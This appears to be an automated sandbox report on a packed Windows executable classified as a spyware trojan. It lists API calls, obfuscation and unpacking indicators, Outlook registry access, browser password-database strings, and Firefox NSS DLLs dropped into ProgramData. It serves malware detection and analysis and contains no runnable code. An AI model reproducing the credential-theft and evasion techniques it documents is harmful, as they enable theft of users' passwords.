Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9	0_2_00C540E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B570CA	0_2_00B570CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5B845	0_2_00C5B845
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5E018	0_2_00C5E018
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6183F	0_2_00C6183F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C59101	0_2_00C59101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D42AAE	0_2_00D42AAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BABA3F	0_2_00BABA3F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B47A20	0_2_00B47A20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5FA6E	0_2_00C5FA6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C525D2	0_2_00C525D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE05D1	0_2_00CE05D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C28D3A	0_2_00C28D3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C57629	0_2_00C57629
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEAF1B	0_2_00BEAF1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5CF6C	0_2_00C5CF6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 008945C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times

Source: file.exe, 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2301971550.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: dqalzxzu ZLIB complexity 0.9952436161130084

Source: file.exe, 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2047168594.0000000005240000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_008A8680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_008A3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\1LQ13VI0.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2137860836.000000001D9BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2118247959.000000001D9C8000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGCFHCGDGCAECBG.0.dr, KKKKEHJKFCFCBFHIIDGD.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301373390.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1805312 > 1048576

Source: file.exe

Static PE information: Raw size of dqalzxzu is bigger than: 0x100000 < 0x192a00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2301867642.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.890000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dqalzxzu:EW;wjtejwab:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dqalzxzu:EW;wjtejwab:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_008A9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c1ed3 should be: 0x1bc4d4

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: dqalzxzu
Source: file.exe	Static PE information: section name: wjtejwab
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push edi; mov dword ptr [esp], esp	0_2_00CCF0E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push 5B431043h; mov dword ptr [esp], eax	0_2_00CCF100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push 15DAEA64h; mov dword ptr [esp], ecx	0_2_00CCF13D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push ebx; mov dword ptr [esp], 7DEEEA7Ch	0_2_00CCF165
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push 4E0CD24Eh; mov dword ptr [esp], edx	0_2_00CCF179
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push 11A5DFF1h; mov dword ptr [esp], edx	0_2_00CCF192
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push 4F20DDDEh; mov dword ptr [esp], ecx	0_2_00CCF1E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push eax; mov dword ptr [esp], 7DDBA130h	0_2_00CCF207
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF0C6 push 13F01409h; mov dword ptr [esp], ebp	0_2_00CCF227
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF98C5 push 0031AAD3h; mov dword ptr [esp], ecx	0_2_00CF9907
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF98C5 push ebp; mov dword ptr [esp], ebx	0_2_00CF9964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5B0BA push ecx; mov dword ptr [esp], edx	0_2_00B5B183
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5B0BA push eax; mov dword ptr [esp], 00000000h	0_2_00B5B212
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE30D9 push 181C6817h; mov dword ptr [esp], edx	0_2_00CE3118
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ecx; mov dword ptr [esp], esi	0_2_00C54103
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push edx; mov dword ptr [esp], ecx	0_2_00C54107
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ebx; mov dword ptr [esp], 1173E801h	0_2_00C5411D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push esi; mov dword ptr [esp], 5B52D782h	0_2_00C5415F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push esi; mov dword ptr [esp], 6299137Bh	0_2_00C5420F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push edi; mov dword ptr [esp], 00000000h	0_2_00C5433B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ebp; mov dword ptr [esp], ebx	0_2_00C543B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ebx; mov dword ptr [esp], 00000000h	0_2_00C543C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push edi; mov dword ptr [esp], ecx	0_2_00C54407
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ebp; mov dword ptr [esp], esp	0_2_00C54473
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push 472C4F6Ah; mov dword ptr [esp], edx	0_2_00C5447B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push edx; mov dword ptr [esp], eax	0_2_00C5453C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push edi; mov dword ptr [esp], eax	0_2_00C5461A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push 1A7C30A6h; mov dword ptr [esp], ebp	0_2_00C5469C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ebp; mov dword ptr [esp], esi	0_2_00C54755
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ecx; mov dword ptr [esp], 7F2DEDF2h	0_2_00C54772
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C540E9 push ebx; mov dword ptr [esp], 0BBC2820h	0_2_00C547D8

Source: file.exe

Static PE information: section name: dqalzxzu entropy: 7.954285698713466

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
